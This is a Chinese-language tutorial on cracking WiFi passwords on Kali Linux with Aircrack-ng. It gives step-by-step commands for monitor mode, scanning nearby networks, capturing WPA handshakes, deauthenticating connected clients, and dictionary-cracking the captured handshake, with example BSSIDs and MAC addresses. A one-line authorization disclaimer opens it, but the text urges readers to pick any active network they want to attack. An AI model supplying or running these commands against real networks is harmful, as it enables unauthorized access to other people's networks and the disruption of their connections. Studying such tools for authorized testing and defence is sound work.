正题
在kali下面Aircrack-ng是一款流行的无线网络渗透测试工具,主要用于密码破解和网络分析。但是,请注意,仅在有合法授权的情况下使用这些工具。
sudo -i :管理员权限
ifconfig :查看当前的网卡信息
确定外接网卡是否是wlan0或者是wlan0mon ,//如果是wlan0mon命令相关的就是wlan0mon
airmon-ng:检查网卡是否支持监听功能的
airmon-ng start wlan0 :激活无线网卡的监听模式
airodump-ng wlan0 :扫描当前周边环境的WiFi信号
//或者
airodump-ng wlan0mon :扫描当前周边环境的WiFi信号
![kali破解WiFi密码详细教程 1 20240505194048351 kali破解WiFi密码详细教程3](https://jacksat.cn/wp-content/uploads/2024/05/20240505194048351-kali破解WiFi密码详细教程3-1024x509.jpg)
下面里的部分信息根据自己的情况进行替换
步骤:
- 信息收集: 首先, 需要使用
airodump-ng
来扫描周围的无线网络,以获取目标网络的信息,如SSID、BSSID和频道号。运行以下命令:
airodump-ng wlan0
//或者
airodump-ng wlan0mon
注意:跑搜索范围信号 结束命令 ctrl+c
选择目标网络: 在扫描结果中,选择 要进行破解的目标网络,记录下它的BSSID和频道号。
![kali破解WiFi密码详细教程 2 20240505194109110 kali破解WiFi密码详细教程 1](https://jacksat.cn/wp-content/uploads/2024/05/20240505194109110-kali破解WiFi密码详细教程-1-1024x668.jpg)
抓取握手包: 使用airodump-ng抓取目标网络的握手包,以便后续进行破解。运行以下命令:
airodump-ng -c <频道号> --bssid <目标BSSID> -w /home/kali/Desktop wlan0mon
airodump-ng -c 1 --bssid A4:1A:3A:8B:1C:66 -w /home/kali/Desktop wlan0mon
显示很多信息,而且是动态的,你只需要知道四个东西就行了:
BSSID:wifi路由的 Mac地址,
Data 当前wifi数据大小,有数据就表明有人正在使用,你就可以把它作为一个选择了。
CH :渠道,后面的攻击要用到。
ESSID: wifi的 名字。还有,他的排序是按信号的强弱来排序的,越往上信号越强。PWR 是强度,不用记,慢慢的就知道了。
![kali破解WiFi密码详细教程 3 20240505194125253 kali破解WiFi密码详细教程 2](https://jacksat.cn/wp-content/uploads/2024/05/20240505194125253-kali破解WiFi密码详细教程-2-830x1024.jpg)
经过观察之后选择一个你想破解或者攻击的wifi,前提是它得有数据显示,Date的那列,所以选择攻击的wifi最好先从Date看起来,选择一个有数据的wifi之后按Ctrl+c 停
注入流量: 执行aireplay-ng来注入流量,以便生成握手包。运行以下命令:
aireplay-ng -0 5 -a <目标BSSID> wlan0mon
这将发送断开连接请求,导致目标设备重新连接并生成握手包。
破解握手包: 使用aircrack-ng对抓取到的握手包进行破解。运行以下命令:
aircrack-ng -w wordlist.txt -b <目标BSSID> capturefile-01.cap
这里,wordlist.txt是密码字典文件,用于尝试密码破解。
ACK 死亡攻击:aireplay-ng -0 10 -a 60:32:B1:56:3F:B2 -c F0:72:EA:E8:72:21 wlan0
暴力破解命令:aircrack-ng -w /home/kali/english.txt -b A4:1A:3A:8B:1C:66 /home/kali/Desktop-0*.cap